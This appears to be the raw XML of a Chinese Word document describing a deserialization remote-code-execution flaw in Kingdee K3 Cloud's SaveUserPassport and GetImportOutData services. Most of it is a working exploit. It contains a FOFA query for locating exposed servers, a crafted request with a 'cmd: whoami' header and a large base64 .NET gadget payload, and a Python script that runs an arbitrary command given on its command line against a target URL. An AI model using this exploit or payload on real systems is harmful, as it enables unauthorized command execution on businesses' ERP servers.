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金蝶云SaveUserPassport存在反序列导致命令执行漏洞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app="Kingdee-K3-cloud"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705" cy="2319655"/>
            <wp:effectExtent l="0" t="0" r="1333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/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc?dcInfo=11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15651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text/plain, */*; q=0.01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Chrome/111.0.5563.111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text/json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cmd: whoami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p0":"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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AAwAAADgN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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3J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k+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFs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","format":"3"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0975" cy="2880360"/>
            <wp:effectExtent l="0" t="0" r="1206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获取命令行参数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= sys.argv[1]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 = sys.argv[2]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构造请求头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url1 = url + "/k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.InOutDataService.GetImportOutData.common.kdsvc"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 =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'Accept': 'text/plain, */*; q=0.01',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'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36',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'Content-Type': 'text/json',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'Accept-Encoding': 'gzip, deflate',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'cmd': cmd,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'Accept-Language': 'zh-CN,zh;q=0.9',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构造请求数据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'{"ap0":"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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AAwAAADgN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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3J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k+AAAACgk+AAAACVIAAAAGWwAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFs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","format":"3"}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proxies =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"http": "http://127.0.0.1:8080",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"https": "https://127.0.0.1:8080",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发送POST请求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= requests.post(url1, headers=headers, data=data, verify=False, timeout=10)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response_first_line = response.text.split('\n')[0]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输出响应内容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"authority" in response.text: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print("命令执行成功")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print("网页响应:" + response_first_line)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print("失败")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1280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F1DCB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="061F1D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65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2023-11-06T06:47:03Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-06T06:48:49Z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EE1308E82D59449CA0D25F1D3D48FE76_12</vt:lpwstr>
  </property>
</Properties>
</file>